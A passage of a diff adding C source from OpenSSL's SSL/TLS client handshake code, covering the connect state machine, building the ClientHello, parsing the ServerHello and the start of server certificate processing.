+            ret = ssl3_get_key_exchange(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_CR_CERT_REQ_A;
+            s->init_num = 0;
+
+            /*
+             * at this point we check that we have the required stuff from
+             * the server
+             */
+            if (!ssl3_check_cert_and_algorithm(s)) {
+                ret = -1;
+                goto end;
+            }
+            break;
+
+        case SSL3_ST_CR_CERT_REQ_A:
+        case SSL3_ST_CR_CERT_REQ_B:
+            ret = ssl3_get_certificate_request(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_CR_SRVR_DONE_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_CR_SRVR_DONE_A:
+        case SSL3_ST_CR_SRVR_DONE_B:
+            ret = ssl3_get_server_done(s);
+            if (ret <= 0)
+                goto end;
+#ifndef OPENSSL_NO_SRP
+            if (s->s3->tmp.new_cipher->algorithm_mkey & SSL_kSRP) {
+                if ((ret = SRP_Calc_A_param(s)) <= 0) {
+                    SSLerr(SSL_F_SSL3_CONNECT, SSL_R_SRP_A_CALC);
+                    ssl3_send_alert(s, SSL3_AL_FATAL, SSL_AD_INTERNAL_ERROR);
+                    goto end;
+                }
+            }
+#endif
+            if (s->s3->tmp.cert_req)
+                s->state = SSL3_ST_CW_CERT_A;
+            else
+                s->state = SSL3_ST_CW_KEY_EXCH_A;
+            s->init_num = 0;
+
+            break;
+
+        case SSL3_ST_CW_CERT_A:
+        case SSL3_ST_CW_CERT_B:
+        case SSL3_ST_CW_CERT_C:
+        case SSL3_ST_CW_CERT_D:
+            ret = ssl3_send_client_certificate(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_CW_KEY_EXCH_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_CW_KEY_EXCH_A:
+        case SSL3_ST_CW_KEY_EXCH_B:
+            ret = ssl3_send_client_key_exchange(s);
+            if (ret <= 0)
+                goto end;
+            /*
+             * EAY EAY EAY need to check for DH fix cert sent back
+             */
+            /*
+             * For TLS, cert_req is set to 2, so a cert chain of nothing is
+             * sent, but no verify packet is sent
+             */
+            /*
+             * XXX: For now, we do not support client authentication in ECDH
+             * cipher suites with ECDH (rather than ECDSA) certificates. We
+             * need to skip the certificate verify message when client's
+             * ECDH public key is sent inside the client certificate.
+             */
+            if (s->s3->tmp.cert_req == 1) {
+                s->state = SSL3_ST_CW_CERT_VRFY_A;
+            } else {
+                s->state = SSL3_ST_CW_CHANGE_A;
+            }
+            if (s->s3->flags & TLS1_FLAGS_SKIP_CERT_VERIFY) {
+                s->state = SSL3_ST_CW_CHANGE_A;
+            }
+
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_CW_CERT_VRFY_A:
+        case SSL3_ST_CW_CERT_VRFY_B:
+            ret = ssl3_send_client_verify(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_CW_CHANGE_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_CW_CHANGE_A:
+        case SSL3_ST_CW_CHANGE_B:
+            ret = ssl3_send_change_cipher_spec(s,
+                                               SSL3_ST_CW_CHANGE_A,
+                                               SSL3_ST_CW_CHANGE_B);
+            if (ret <= 0)
+                goto end;
+
+#if defined(OPENSSL_NO_TLSEXT) || defined(OPENSSL_NO_NEXTPROTONEG)
+            s->state = SSL3_ST_CW_FINISHED_A;
+#else
+            if (s->s3->next_proto_neg_seen)
+                s->state = SSL3_ST_CW_NEXT_PROTO_A;
+            else
+                s->state = SSL3_ST_CW_FINISHED_A;
+#endif
+            s->init_num = 0;
+
+            s->session->cipher = s->s3->tmp.new_cipher;
+#ifdef OPENSSL_NO_COMP
+            s->session->compress_meth = 0;
+#else
+            if (s->s3->tmp.new_compression == NULL)
+                s->session->compress_meth = 0;
+            else
+                s->session->compress_meth = s->s3->tmp.new_compression->id;
+#endif
+            if (!s->method->ssl3_enc->setup_key_block(s)) {
+                ret = -1;
+                goto end;
+            }
+
+            if (!s->method->ssl3_enc->change_cipher_state(s,
+                                                          SSL3_CHANGE_CIPHER_CLIENT_WRITE))
+            {
+                ret = -1;
+                goto end;
+            }
+
+            break;
+
+#if !defined(OPENSSL_NO_TLSEXT) && !defined(OPENSSL_NO_NEXTPROTONEG)
+        case SSL3_ST_CW_NEXT_PROTO_A:
+        case SSL3_ST_CW_NEXT_PROTO_B:
+            ret = ssl3_send_next_proto(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_CW_FINISHED_A;
+            break;
+#endif
+
+        case SSL3_ST_CW_FINISHED_A:
+        case SSL3_ST_CW_FINISHED_B:
+            ret = ssl3_send_finished(s,
+                                     SSL3_ST_CW_FINISHED_A,
+                                     SSL3_ST_CW_FINISHED_B,
+                                     s->method->
+                                     ssl3_enc->client_finished_label,
+                                     s->method->
+                                     ssl3_enc->client_finished_label_len);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_CW_FLUSH;
+
+            /* clear flags */
+            s->s3->flags &= ~SSL3_FLAGS_POP_BUFFER;
+            if (s->hit) {
+                s->s3->tmp.next_state = SSL_ST_OK;
+                if (s->s3->flags & SSL3_FLAGS_DELAY_CLIENT_FINISHED) {
+                    s->state = SSL_ST_OK;
+                    s->s3->flags |= SSL3_FLAGS_POP_BUFFER;
+                    s->s3->delay_buf_pop_ret = 0;
+                }
+            } else {
+#ifndef OPENSSL_NO_TLSEXT
+                /*
+                 * Allow NewSessionTicket if ticket expected
+                 */
+                if (s->tlsext_ticket_expected)
+                    s->s3->tmp.next_state = SSL3_ST_CR_SESSION_TICKET_A;
+                else
+#endif
+
+                    s->s3->tmp.next_state = SSL3_ST_CR_FINISHED_A;
+            }
+            s->init_num = 0;
+            break;
+
+#ifndef OPENSSL_NO_TLSEXT
+        case SSL3_ST_CR_SESSION_TICKET_A:
+        case SSL3_ST_CR_SESSION_TICKET_B:
+            ret = ssl3_get_new_session_ticket(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_CR_FINISHED_A;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_CR_CERT_STATUS_A:
+        case SSL3_ST_CR_CERT_STATUS_B:
+            ret = ssl3_get_cert_status(s);
+            if (ret <= 0)
+                goto end;
+            s->state = SSL3_ST_CR_KEY_EXCH_A;
+            s->init_num = 0;
+            break;
+#endif
+
+        case SSL3_ST_CR_FINISHED_A:
+        case SSL3_ST_CR_FINISHED_B:
+            s->s3->flags |= SSL3_FLAGS_CCS_OK;
+            ret = ssl3_get_finished(s, SSL3_ST_CR_FINISHED_A,
+                                    SSL3_ST_CR_FINISHED_B);
+            if (ret <= 0)
+                goto end;
+
+            if (s->hit)
+                s->state = SSL3_ST_CW_CHANGE_A;
+            else
+                s->state = SSL_ST_OK;
+            s->init_num = 0;
+            break;
+
+        case SSL3_ST_CW_FLUSH:
+            s->rwstate = SSL_WRITING;
+            if (BIO_flush(s->wbio) <= 0) {
+                ret = -1;
+                goto end;
+            }
+            s->rwstate = SSL_NOTHING;
+            s->state = s->s3->tmp.next_state;
+            break;
+
+        case SSL_ST_OK:
+            /* clean a few things up */
+            ssl3_cleanup_key_block(s);
+
+            if (s->init_buf != NULL) {
+                BUF_MEM_free(s->init_buf);
+                s->init_buf = NULL;
+            }
+
+            /*
+             * If we are not 'joining' the last two packets, remove the
+             * buffering now
+             */
+            if (!(s->s3->flags & SSL3_FLAGS_POP_BUFFER))
+                ssl_free_wbio_buffer(s);
+            /* else do it later in ssl3_write */
+
+            s->init_num = 0;
+            s->renegotiate = 0;
+            s->new_session = 0;
+
+            ssl_update_cache(s, SSL_SESS_CACHE_CLIENT);
+            if (s->hit)
+                s->ctx->stats.sess_hit++;
+
+            ret = 1;
+            /* s->server=0; */
+            s->handshake_func = ssl3_connect;
+            s->ctx->stats.sess_connect_good++;
+
+            if (cb != NULL)
+                cb(s, SSL_CB_HANDSHAKE_DONE, 1);
+
+            goto end;
+            /* break; */
+
+        default:
+            SSLerr(SSL_F_SSL3_CONNECT, SSL_R_UNKNOWN_STATE);
+            ret = -1;
+            goto end;
+            /* break; */
+        }
+
+        /* did we do anything */
+        if (!s->s3->tmp.reuse_message && !skip) {
+            if (s->debug) {
+                if ((ret = BIO_flush(s->wbio)) <= 0)
+                    goto end;
+            }
+
+            if ((cb != NULL) && (s->state != state)) {
+                new_state = s->state;
+                s->state = state;
+                cb(s, SSL_CB_CONNECT_LOOP, 1);
+                s->state = new_state;
+            }
+        }
+        skip = 0;
+    }
+ end:
+    s->in_handshake--;
+    if (buf != NULL)
+        BUF_MEM_free(buf);
+    if (cb != NULL)
+        cb(s, SSL_CB_CONNECT_EXIT, ret);
+    return (ret);
+}
+
+int ssl3_client_hello(SSL *s)
+{
+    unsigned char *buf;
+    unsigned char *p, *d;
+    int i;
+    unsigned long l;
+    int al = 0;
+#ifndef OPENSSL_NO_COMP
+    int j;
+    SSL_COMP *comp;
+#endif
+
+    buf = (unsigned char *)s->init_buf->data;
+    if (s->state == SSL3_ST_CW_CLNT_HELLO_A) {
+        SSL_SESSION *sess = s->session;
+        if ((sess == NULL) ||
+            (sess->ssl_version != s->version) ||
+            !sess->session_id_length || (sess->not_resumable)) {
+            if (!ssl_get_new_session(s, 0))
+                goto err;
+        }
+        if (s->method->version == DTLS_ANY_VERSION) {
+            /* Determine which DTLS version to use */
+            int options = s->options;
+            /* If DTLS 1.2 disabled correct the version number */
+            if (options & SSL_OP_NO_DTLSv1_2) {
+                if (tls1_suiteb(s)) {
+                    SSLerr(SSL_F_SSL3_CLIENT_HELLO,
+                           SSL_R_ONLY_DTLS_1_2_ALLOWED_IN_SUITEB_MODE);
+                    goto err;
+                }
+                /*
+                 * Disabling all versions is silly: return an error.
+                 */
+                if (options & SSL_OP_NO_DTLSv1) {
+                    SSLerr(SSL_F_SSL3_CLIENT_HELLO, SSL_R_WRONG_SSL_VERSION);
+                    goto err;
+                }
+                /*
+                 * Update method so we don't use any DTLS 1.2 features.
+                 */
+                s->method = DTLSv1_client_method();
+                s->version = DTLS1_VERSION;
+            } else {
+                /*
+                 * We only support one version: update method
+                 */
+                if (options & SSL_OP_NO_DTLSv1)
+                    s->method = DTLSv1_2_client_method();
+                s->version = DTLS1_2_VERSION;
+            }
+            s->client_version = s->version;
+        }
+        /* else use the pre-loaded session */
+
+        p = s->s3->client_random;
+
+        /*
+         * for DTLS if client_random is initialized, reuse it, we are
+         * required to use same upon reply to HelloVerify
+         */
+        if (SSL_IS_DTLS(s)) {
+            size_t idx;
+            i = 1;
+            for (idx = 0; idx < sizeof(s->s3->client_random); idx++) {
+                if (p[idx]) {
+                    i = 0;
+                    break;
+                }
+            }
+        } else
+            i = 1;
+
+        if (i)
+            ssl_fill_hello_random(s, 0, p, sizeof(s->s3->client_random));
+
+        /* Do the message type and length last */
+        d = p = ssl_handshake_start(s);
+
+        /*-
+         * version indicates the negotiated version: for example from
+         * an SSLv2/v3 compatible client hello). The client_version
+         * field is the maximum version we permit and it is also
+         * used in RSA encrypted premaster secrets. Some servers can
+         * choke if we initially report a higher version then
+         * renegotiate to a lower one in the premaster secret. This
+         * didn't happen with TLS 1.0 as most servers supported it
+         * but it can with TLS 1.1 or later if the server only supports
+         * 1.0.
+         *
+         * Possible scenario with previous logic:
+         *      1. Client hello indicates TLS 1.2
+         *      2. Server hello says TLS 1.0
+         *      3. RSA encrypted premaster secret uses 1.2.
+         *      4. Handhaked proceeds using TLS 1.0.
+         *      5. Server sends hello request to renegotiate.
+         *      6. Client hello indicates TLS v1.0 as we now
+         *         know that is maximum server supports.
+         *      7. Server chokes on RSA encrypted premaster secret
+         *         containing version 1.0.
+         *
+         * For interoperability it should be OK to always use the
+         * maximum version we support in client hello and then rely
+         * on the checking of version to ensure the servers isn't
+         * being inconsistent: for example initially negotiating with
+         * TLS 1.0 and renegotiating with TLS 1.2. We do this by using
+         * client_version in client hello and not resetting it to
+         * the negotiated version.
+         */
+#if 0
+        *(p++) = s->version >> 8;
+        *(p++) = s->version & 0xff;
+        s->client_version = s->version;
+#else
+        *(p++) = s->client_version >> 8;
+        *(p++) = s->client_version & 0xff;
+#endif
+
+        /* Random stuff */
+        memcpy(p, s->s3->client_random, SSL3_RANDOM_SIZE);
+        p += SSL3_RANDOM_SIZE;
+
+        /* Session ID */
+        if (s->new_session)
+            i = 0;
+        else
+            i = s->session->session_id_length;
+        *(p++) = i;
+        if (i != 0) {
+            if (i > (int)sizeof(s->session->session_id)) {
+                SSLerr(SSL_F_SSL3_CLIENT_HELLO, ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+            memcpy(p, s->session->session_id, i);
+            p += i;
+        }
+
+        /* cookie stuff for DTLS */
+        if (SSL_IS_DTLS(s)) {
+            if (s->d1->cookie_len > sizeof(s->d1->cookie)) {
+                SSLerr(SSL_F_SSL3_CLIENT_HELLO, ERR_R_INTERNAL_ERROR);
+                goto err;
+            }
+            *(p++) = s->d1->cookie_len;
+            memcpy(p, s->d1->cookie, s->d1->cookie_len);
+            p += s->d1->cookie_len;
+        }
+
+        /* Ciphers supported */
+        i = ssl_cipher_list_to_bytes(s, SSL_get_ciphers(s), &(p[2]), 0);
+        if (i == 0) {
+            SSLerr(SSL_F_SSL3_CLIENT_HELLO, SSL_R_NO_CIPHERS_AVAILABLE);
+            goto err;
+        }
+#ifdef OPENSSL_MAX_TLS1_2_CIPHER_LENGTH
+        /*
+         * Some servers hang if client hello > 256 bytes as hack workaround
+         * chop number of supported ciphers to keep it well below this if we
+         * use TLS v1.2
+         */
+        if (TLS1_get_version(s) >= TLS1_2_VERSION
+            && i > OPENSSL_MAX_TLS1_2_CIPHER_LENGTH)
+            i = OPENSSL_MAX_TLS1_2_CIPHER_LENGTH & ~1;
+#endif
+        s2n(i, p);
+        p += i;
+
+        /* COMPRESSION */
+#ifdef OPENSSL_NO_COMP
+        *(p++) = 1;
+#else
+
+        if ((s->options & SSL_OP_NO_COMPRESSION)
+            || !s->ctx->comp_methods)
+            j = 0;
+        else
+            j = sk_SSL_COMP_num(s->ctx->comp_methods);
+        *(p++) = 1 + j;
+        for (i = 0; i < j; i++) {
+            comp = sk_SSL_COMP_value(s->ctx->comp_methods, i);
+            *(p++) = comp->id;
+        }
+#endif
+        *(p++) = 0;             /* Add the NULL method */
+
+#ifndef OPENSSL_NO_TLSEXT
+        /* TLS extensions */
+        if (ssl_prepare_clienthello_tlsext(s) <= 0) {
+            SSLerr(SSL_F_SSL3_CLIENT_HELLO, SSL_R_CLIENTHELLO_TLSEXT);
+            goto err;
+        }
+        if ((p =
+             ssl_add_clienthello_tlsext(s, p, buf + SSL3_RT_MAX_PLAIN_LENGTH,
+                                        &al)) == NULL) {
+            ssl3_send_alert(s, SSL3_AL_FATAL, al);
+            SSLerr(SSL_F_SSL3_CLIENT_HELLO, ERR_R_INTERNAL_ERROR);
+            goto err;
+        }
+#endif
+
+        l = p - d;
+        ssl_set_handshake_header(s, SSL3_MT_CLIENT_HELLO, l);
+        s->state = SSL3_ST_CW_CLNT_HELLO_B;
+    }
+
+    /* SSL3_ST_CW_CLNT_HELLO_B */
+    return ssl_do_write(s);
+ err:
+    return (-1);
+}
+
+int ssl3_get_server_hello(SSL *s)
+{
+    STACK_OF(SSL_CIPHER) *sk;
+    const SSL_CIPHER *c;
+    CERT *ct = s->cert;
+    unsigned char *p, *d;
+    int i, al = SSL_AD_INTERNAL_ERROR, ok;
+    unsigned int j;
+    long n;
+#ifndef OPENSSL_NO_COMP
+    SSL_COMP *comp;
+#endif
+    /*
+     * Hello verify request and/or server hello version may not match so set
+     * first packet if we're negotiating version.
+     */
+    if (SSL_IS_DTLS(s))
+        s->first_packet = 1;
+
+    n = s->method->ssl_get_message(s,
+                                   SSL3_ST_CR_SRVR_HELLO_A,
+                                   SSL3_ST_CR_SRVR_HELLO_B, -1, 20000, &ok);
+
+    if (!ok)
+        return ((int)n);
+
+    if (SSL_IS_DTLS(s)) {
+        s->first_packet = 0;
+        if (s->s3->tmp.message_type == DTLS1_MT_HELLO_VERIFY_REQUEST) {
+            if (s->d1->send_cookie == 0) {
+                s->s3->tmp.reuse_message = 1;
+                return 1;
+            } else {            /* already sent a cookie */
+
+                al = SSL_AD_UNEXPECTED_MESSAGE;
+                SSLerr(SSL_F_SSL3_GET_SERVER_HELLO, SSL_R_BAD_MESSAGE_TYPE);
+                goto f_err;
+            }
+        }
+    }
+
+    if (s->s3->tmp.message_type != SSL3_MT_SERVER_HELLO) {
+        al = SSL_AD_UNEXPECTED_MESSAGE;
+        SSLerr(SSL_F_SSL3_GET_SERVER_HELLO, SSL_R_BAD_MESSAGE_TYPE);
+        goto f_err;
+    }
+
+    d = p = (unsigned char *)s->init_msg;
+    if (s->method->version == DTLS_ANY_VERSION) {
+        /* Work out correct protocol version to use */
+        int hversion = (p[0] << 8) | p[1];
+        int options = s->options;
+        if (hversion == DTLS1_2_VERSION && !(options & SSL_OP_NO_DTLSv1_2))
+            s->method = DTLSv1_2_client_method();
+        else if (tls1_suiteb(s)) {
+            SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,
+                   SSL_R_ONLY_DTLS_1_2_ALLOWED_IN_SUITEB_MODE);
+            s->version = hversion;
+            al = SSL_AD_PROTOCOL_VERSION;
+            goto f_err;
+        } else if (hversion == DTLS1_VERSION && !(options & SSL_OP_NO_DTLSv1))
+            s->method = DTLSv1_client_method();
+        else {
+            SSLerr(SSL_F_SSL3_GET_SERVER_HELLO, SSL_R_WRONG_SSL_VERSION);
+            s->version = hversion;
+            al = SSL_AD_PROTOCOL_VERSION;
+            goto f_err;
+        }
+        s->version = s->method->version;
+    }
+
+    if ((p[0] != (s->version >> 8)) || (p[1] != (s->version & 0xff))) {
+        SSLerr(SSL_F_SSL3_GET_SERVER_HELLO, SSL_R_WRONG_SSL_VERSION);
+        s->version = (s->version & 0xff00) | p[1];
+        al = SSL_AD_PROTOCOL_VERSION;
+        goto f_err;
+    }
+    p += 2;
+
+    /* load the server hello data */
+    /* load the server random */
+    memcpy(s->s3->server_random, p, SSL3_RANDOM_SIZE);
+    p += SSL3_RANDOM_SIZE;
+
+    s->hit = 0;
+
+    /* get the session-id */
+    j = *(p++);
+
+    if ((j > sizeof s->session->session_id) || (j > SSL3_SESSION_ID_SIZE)) {
+        al = SSL_AD_ILLEGAL_PARAMETER;
+        SSLerr(SSL_F_SSL3_GET_SERVER_HELLO, SSL_R_SSL3_SESSION_ID_TOO_LONG);
+        goto f_err;
+    }
+#ifndef OPENSSL_NO_TLSEXT
+    /*
+     * check if we want to resume the session based on external pre-shared
+     * secret
+     */
+    if (s->version >= TLS1_VERSION && s->tls_session_secret_cb) {
+        SSL_CIPHER *pref_cipher = NULL;
+        s->session->master_key_length = sizeof(s->session->master_key);
+        if (s->tls_session_secret_cb(s, s->session->master_key,
+                                     &s->session->master_key_length,
+                                     NULL, &pref_cipher,
+                                     s->tls_session_secret_cb_arg)) {
+            s->session->cipher = pref_cipher ?
+                pref_cipher : ssl_get_cipher_by_char(s, p + j);
+            s->hit = 1;
+        }
+    }
+#endif                          /* OPENSSL_NO_TLSEXT */
+
+    if (!s->hit && j != 0 && j == s->session->session_id_length
+        && memcmp(p, s->session->session_id, j) == 0) {
+        if (s->sid_ctx_length != s->session->sid_ctx_length
+            || memcmp(s->session->sid_ctx, s->sid_ctx, s->sid_ctx_length)) {
+            /* actually a client application bug */
+            al = SSL_AD_ILLEGAL_PARAMETER;
+            SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,
+                   SSL_R_ATTEMPT_TO_REUSE_SESSION_IN_DIFFERENT_CONTEXT);
+            goto f_err;
+        }
+        s->hit = 1;
+    }
+    /* a miss or crap from the other end */
+    if (!s->hit) {
+        /*
+         * If we were trying for session-id reuse, make a new SSL_SESSION so
+         * we don't stuff up other people
+         */
+        if (s->session->session_id_length > 0) {
+            if (!ssl_get_new_session(s, 0)) {
+                goto f_err;
+            }
+        }
+        s->session->session_id_length = j;
+        memcpy(s->session->session_id, p, j); /* j could be 0 */
+    }
+    p += j;
+    c = ssl_get_cipher_by_char(s, p);
+    if (c == NULL) {
+        /* unknown cipher */
+        al = SSL_AD_ILLEGAL_PARAMETER;
+        SSLerr(SSL_F_SSL3_GET_SERVER_HELLO, SSL_R_UNKNOWN_CIPHER_RETURNED);
+        goto f_err;
+    }
+    /*
+     * If it is a disabled cipher we didn't send it in client hello, so
+     * return an error.
+     */
+    if (c->algorithm_ssl & ct->mask_ssl ||
+        c->algorithm_mkey & ct->mask_k || c->algorithm_auth & ct->mask_a) {
+        al = SSL_AD_ILLEGAL_PARAMETER;
+        SSLerr(SSL_F_SSL3_GET_SERVER_HELLO, SSL_R_WRONG_CIPHER_RETURNED);
+        goto f_err;
+    }
+    p += ssl_put_cipher_by_char(s, NULL, NULL);
+
+    sk = ssl_get_ciphers_by_id(s);
+    i = sk_SSL_CIPHER_find(sk, c);
+    if (i < 0) {
+        /* we did not say we would use this cipher */
+        al = SSL_AD_ILLEGAL_PARAMETER;
+        SSLerr(SSL_F_SSL3_GET_SERVER_HELLO, SSL_R_WRONG_CIPHER_RETURNED);
+        goto f_err;
+    }
+
+    /*
+     * Depending on the session caching (internal/external), the cipher
+     * and/or cipher_id values may not be set. Make sure that cipher_id is
+     * set and use it for comparison.
+     */
+    if (s->session->cipher)
+        s->session->cipher_id = s->session->cipher->id;
+    if (s->hit && (s->session->cipher_id != c->id)) {
+/* Workaround is now obsolete */
+#if 0
+        if (!(s->options & SSL_OP_NETSCAPE_REUSE_CIPHER_CHANGE_BUG))
+#endif
+        {
+            al = SSL_AD_ILLEGAL_PARAMETER;
+            SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,
+                   SSL_R_OLD_SESSION_CIPHER_NOT_RETURNED);
+            goto f_err;
+        }
+    }
+    s->s3->tmp.new_cipher = c;
+    /*
+     * Don't digest cached records if no sigalgs: we may need them for client
+     * authentication.
+     */
+    if (!SSL_USE_SIGALGS(s) && !ssl3_digest_cached_records(s))
+        goto f_err;
+    /* lets get the compression algorithm */
+    /* COMPRESSION */
+#ifdef OPENSSL_NO_COMP
+    if (*(p++) != 0) {
+        al = SSL_AD_ILLEGAL_PARAMETER;
+        SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,
+               SSL_R_UNSUPPORTED_COMPRESSION_ALGORITHM);
+        goto f_err;
+    }
+    /*
+     * If compression is disabled we'd better not try to resume a session
+     * using compression.
+     */
+    if (s->session->compress_meth != 0) {
+        SSLerr(SSL_F_SSL3_GET_SERVER_HELLO, SSL_R_INCONSISTENT_COMPRESSION);
+        goto f_err;
+    }
+#else
+    j = *(p++);
+    if (s->hit && j != s->session->compress_meth) {
+        al = SSL_AD_ILLEGAL_PARAMETER;
+        SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,
+               SSL_R_OLD_SESSION_COMPRESSION_ALGORITHM_NOT_RETURNED);
+        goto f_err;
+    }
+    if (j == 0)
+        comp = NULL;
+    else if (s->options & SSL_OP_NO_COMPRESSION) {
+        al = SSL_AD_ILLEGAL_PARAMETER;
+        SSLerr(SSL_F_SSL3_GET_SERVER_HELLO, SSL_R_COMPRESSION_DISABLED);
+        goto f_err;
+    } else
+        comp = ssl3_comp_find(s->ctx->comp_methods, j);
+
+    if ((j != 0) && (comp == NULL)) {
+        al = SSL_AD_ILLEGAL_PARAMETER;
+        SSLerr(SSL_F_SSL3_GET_SERVER_HELLO,
+               SSL_R_UNSUPPORTED_COMPRESSION_ALGORITHM);
+        goto f_err;
+    } else {
+        s->s3->tmp.new_compression = comp;
+    }
+#endif
+
+#ifndef OPENSSL_NO_TLSEXT
+    /* TLS extensions */
+    if (!ssl_parse_serverhello_tlsext(s, &p, d, n)) {
+        SSLerr(SSL_F_SSL3_GET_SERVER_HELLO, SSL_R_PARSE_TLSEXT);
+        goto err;
+    }
+#endif
+
+    if (p != (d + n)) {
+        /* wrong packet length */
+        al = SSL_AD_DECODE_ERROR;
+        SSLerr(SSL_F_SSL3_GET_SERVER_HELLO, SSL_R_BAD_PACKET_LENGTH);
+        goto f_err;
+    }
+
+    return (1);
+ f_err:
+    ssl3_send_alert(s, SSL3_AL_FATAL, al);
+ err:
+    return (-1);
+}
+
+int ssl3_get_server_certificate(SSL *s)
+{
+    int al, i, ok, ret = -1;
+    unsigned long n, nc, llen, l;
+    X509 *x = NULL;
+    const unsigned char *q, *p;
+    unsigned char *d;
+    STACK_OF(X509) *sk = NULL;
+    SESS_CERT *sc;
+    EVP_PKEY *pkey = NULL;
+    int need_cert = 1;          /* VRS: 0=> will allow null cert if auth ==
+                                 * KRB5 */
+
+    n = s->method->ssl_get_message(s,
+                                   SSL3_ST_CR_CERT_A,
+                                   SSL3_ST_CR_CERT_B,
+                                   -1, s->max_cert_list, &ok);
+
+    if (!ok)
+        return ((int)n);
+
+    if ((s->s3->tmp.message_type == SSL3_MT_SERVER_KEY_EXCHANGE) ||
+        ((s->s3->tmp.new_cipher->algorithm_auth & SSL_aKRB5) &&
+         (s->s3->tmp.message_type == SSL3_MT_SERVER_DONE))) {
+        s->s3->tmp.reuse_message = 1;
+        return (1);
+    }
+
+    if (s->s3->tmp.message_type != SSL3_MT_CERTIFICATE) {
+        al = SSL_AD_UNEXPECTED_MESSAGE;
+        SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE, SSL_R_BAD_MESSAGE_TYPE);
+        goto f_err;
+    }
+    p = d = (unsigned char *)s->init_msg;
+
+    if ((sk = sk_X509_new_null()) == NULL) {
+        SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE, ERR_R_MALLOC_FAILURE);
+        goto err;
+    }
+
+    n2l3(p, llen);
+    if (llen + 3 != n) {
+        al = SSL_AD_DECODE_ERROR;
+        SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE, SSL_R_LENGTH_MISMATCH);
+        goto f_err;
+    }
+    for (nc = 0; nc < llen;) {
+        n2l3(p, l);
+        if ((l + nc + 3) > llen) {
+            al = SSL_AD_DECODE_ERROR;
+            SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,
+                   SSL_R_CERT_LENGTH_MISMATCH);
+            goto f_err;
+        }
+
+        q = p;
+        x = d2i_X509(NULL, &q, l);
+        if (x == NULL) {
+            al = SSL_AD_BAD_CERTIFICATE;
+            SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE, ERR_R_ASN1_LIB);
+            goto f_err;
+        }
+        if (q != (p + l)) {
+            al = SSL_AD_DECODE_ERROR;
+            SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,
+                   SSL_R_CERT_LENGTH_MISMATCH);
+            goto f_err;
+        }
+        if (!sk_X509_push(sk, x)) {
+            SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE, ERR_R_MALLOC_FAILURE);
+            goto err;
+        }
+        x = NULL;
+        nc += l + 3;
+        p = q;
+    }
+
+    i = ssl_verify_cert_chain(s, sk);
+    if ((s->verify_mode != SSL_VERIFY_NONE) && (i <= 0)
+#ifndef OPENSSL_NO_KRB5
+        && !((s->s3->tmp.new_cipher->algorithm_mkey & SSL_kKRB5) &&
+             (s->s3->tmp.new_cipher->algorithm_auth & SSL_aKRB5))
+#endif                          /* OPENSSL_NO_KRB5 */
+        ) {
+        al = ssl_verify_alarm_type(s->verify_result);
+        SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,
+               SSL_R_CERTIFICATE_VERIFY_FAILED);
+        goto f_err;
+    }
+    ERR_clear_error();          /* but we keep s->verify_result */
+
+    sc = ssl_sess_cert_new();
+    if (sc == NULL)
+        goto err;
+
+    if (s->session->sess_cert)
+        ssl_sess_cert_free(s->session->sess_cert);
+    s->session->sess_cert = sc;
+
+    sc->cert_chain = sk;
+    /*
+     * Inconsistency alert: cert_chain does include the peer's certificate,
+     * which we don't include in s3_srvr.c
+     */
+    x = sk_X509_value(sk, 0);
+    sk = NULL;
+    /*
+     * VRS 19990621: possible memory leak; sk=null ==> !sk_pop_free() @end
+     */
+
+    pkey = X509_get_pubkey(x);
+
+    /* VRS: allow null cert if auth == KRB5 */
+    need_cert = ((s->s3->tmp.new_cipher->algorithm_mkey & SSL_kKRB5) &&
+                 (s->s3->tmp.new_cipher->algorithm_auth & SSL_aKRB5))
+        ? 0 : 1;
+
+#ifdef KSSL_DEBUG
+    fprintf(stderr, "pkey,x = %p, %p\n", pkey, x);
+    fprintf(stderr, "ssl_cert_type(x,pkey) = %d\n", ssl_cert_type(x, pkey));
+    fprintf(stderr, "cipher, alg, nc = %s, %lx, %lx, %d\n",
+            s->s3->tmp.new_cipher->name,
+            s->s3->tmp.new_cipher->algorithm_mkey,
+            s->s3->tmp.new_cipher->algorithm_auth, need_cert);
+#endif                          /* KSSL_DEBUG */
+
+    if (need_cert && ((pkey == NULL) || EVP_PKEY_missing_parameters(pkey))) {
+        x = NULL;
+        al = SSL3_AL_FATAL;
+        SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,
+               SSL_R_UNABLE_TO_FIND_PUBLIC_KEY_PARAMETERS);
+        goto f_err;
+    }
+
+    i = ssl_cert_type(x, pkey);
+    if (need_cert && i < 0) {
+        x = NULL;
+        al = SSL3_AL_FATAL;
+        SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,
+               SSL_R_UNKNOWN_CERTIFICATE_TYPE);
+        goto f_err;
+    }
+
+    if (need_cert) {
+        int exp_idx = ssl_cipher_get_cert_index(s->s3->tmp.new_cipher);
+        if (exp_idx >= 0 && i != exp_idx) {
+            x = NULL;
+            al = SSL_AD_ILLEGAL_PARAMETER;
+            SSLerr(SSL_F_SSL3_GET_SERVER_CERTIFICATE,
+                   SSL_R_WRONG_CERTIFICATE_TYPE);
+            goto f_err;
+        }
+        sc->peer_cert_type = i;
